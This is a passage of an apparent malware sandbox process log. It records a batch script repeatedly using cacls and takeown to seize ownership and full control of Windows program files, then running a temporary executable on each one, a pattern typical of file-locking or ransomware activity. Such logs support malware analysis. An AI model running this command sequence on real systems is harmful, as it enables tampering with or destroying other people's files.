    cacls "C:\Program Files (x86)\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\es-ES\WinMail.exe.mui"
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3132
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:3008
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:3648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4512
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2068
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1860
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:3640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3672
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:3728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    PID:3744
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      PID:3600
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  PID:3700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    PID:3724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    PID:1780
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      PID:5112
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  PID:3048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    PID:4812
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      PID:5032
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  PID:4920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:3596
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:3776
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:3752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:3572
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:2336
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:4620
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui""
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:5024
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:920
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""
  2⤵
  PID:4776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:2616
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:3140
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui""
  2⤵
  PID:2836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui"
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:940
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:2988
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:3168
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:3056
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui""
  2⤵
  PID:3224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:2936
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""
  2⤵
  PID:3856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"
    3⤵
    PID:3828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Month_Calendar.jtp" -nobanner
    3⤵
    PID:3812
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Month_Calendar.jtp" -nobanner
      4⤵
      PID:3216
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2684
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:2956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:5016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3824
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1052
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:3948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3252
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:816
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  PID:4180
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    PID:3128
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui""
  2⤵
  PID:3236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\NBMapTIP.dll.mui"
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:4912
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui""
  2⤵
  PID:3280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui"
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:3024
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:4016
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui""
  2⤵
  PID:4960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:3904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui"
    3⤵
    PID:204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:3396
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""
  2⤵
  PID:4780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"
    3⤵
    - Modifies file permissions
    PID:4724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Dotted_Line.jtp" -nobanner
    3⤵
    PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Dotted_Line.jtp" -nobanner
      4⤵
      PID:3316
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:4928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:3512
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2012
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:3952
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:1020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4064
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:3016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4084
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4000
